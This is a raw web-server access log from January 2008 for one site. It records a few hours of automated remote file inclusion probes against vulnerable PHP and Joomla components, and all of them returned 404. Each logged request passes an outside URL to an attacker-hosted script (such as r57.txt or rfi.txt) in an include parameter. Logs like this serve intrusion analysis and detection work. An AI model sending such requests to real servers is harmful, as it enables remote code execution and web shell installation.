200.80.35.36 - - [12/Jan/2008:06:22:27 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:22:27 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:22:28 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.65" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:26 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:26 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:26 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:26 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:26 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:26 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:36 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:36 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:23:36 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:06:25:30 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.shikea.se/file/iid.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:06:25:30 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.shikea.se/file/iid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:26:06 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:26:06 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:26:06 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:26:37 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:26:37 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:26:37 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:29:11 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:06:30:05 -0800] "GET /logs/access.log//include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:06:30:06 -0800] "GET //include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [12/Jan/2008:06:30:06 -0800] "GET /logs//include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.59.195.106 - - [12/Jan/2008:06:31:04 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://geocities.com/aliif_1604/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.59.195.106 - - [12/Jan/2008:06:31:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/aliif_1604/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:32:15 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:32:16 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:32:16 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:32:26 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:32:39 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.59.195.106 - - [12/Jan/2008:06:34:39 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.59.195.106 - - [12/Jan/2008:06:34:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.808" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:35:27 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:35:27 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.150.184.78 - - [12/Jan/2008:06:35:27 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:35:49 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:35:49 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:35:50 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:35:50 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:36:09 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:36:09 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:36:10 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:36:14 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:36:15 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:36:36 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:36:37 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:06:40:31 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 305 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:06:40:32 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:06:40:33 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.64.166 - - [12/Jan/2008:06:44:42 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 337 "-" "libwww-perl/5.805" "www.projectpr.com"
91.121.64.166 - - [12/Jan/2008:06:44:43 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.121.64.166 - - [12/Jan/2008:06:44:43 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.94.56.106 - - [12/Jan/2008:06:44:51 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
69.94.56.106 - - [12/Jan/2008:06:45:16 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
69.94.56.106 - - [12/Jan/2008:06:45:16 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
69.94.56.106 - - [12/Jan/2008:06:45:16 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:06:47:38 -0800] "GET /start.php?id=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:06:49:02 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 322 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:06:49:02 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:06:49:02 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
210.118.178.185 - - [12/Jan/2008:06:50:17 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 337 "-" "libwww-perl/5.805" "www.projectpr.com"
210.118.178.185 - - [12/Jan/2008:06:50:17 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
210.118.178.185 - - [12/Jan/2008:06:50:18 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:06:52:24 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:06:52:24 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
210.118.178.185 - - [12/Jan/2008:06:52:25 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:06:52:32 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:06:52:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:06:53:31 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:06:53:32 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.192.212 - - [12/Jan/2008:06:53:32 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:06:56:52 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:06:56:52 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [12/Jan/2008:06:56:52 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.79" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:06:58:45 -0800] "GET /logs/access_070812.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.80.161.70 - - [12/Jan/2008:07:02:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://iris-ex.ru/images/.bash/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.projectpr.com"
213.80.161.70 - - [12/Jan/2008:07:02:59 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://iris-ex.ru/images/.bash/test.txt? HTTP/1.1" 404 290 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:06:50 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:06:51 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:06:56 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:06:56 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:08:19 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:08:19 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:08:25 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:07:08:25 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:07:11:49 -0800] "GET /logs/access_070812.log/components/com_simpleboard/image_upload.php?sbp=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:07:11:49 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:07:11:50 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.803" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:07:11:58 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:07:13:08 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:07:13:19 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.214.18.196 - - [12/Jan/2008:07:13:55 -0800] "GET /logs/access_070712.log/components/com_simpleboard/image_upload.php?sbp=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803" "www.projectpr.com"
91.186.4.142 - - [12/Jan/2008:07:16:33 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.186.4.142 - - [12/Jan/2008:07:16:35 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.186.4.142 - - [12/Jan/2008:07:16:35 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:07:19:15 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:07:19:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:07:19:17 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:07:19:21 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
147.99.18.48 - - [12/Jan/2008:07:20:31 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.projectpr.com"
147.99.18.48 - - [12/Jan/2008:07:20:31 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.projectpr.com"
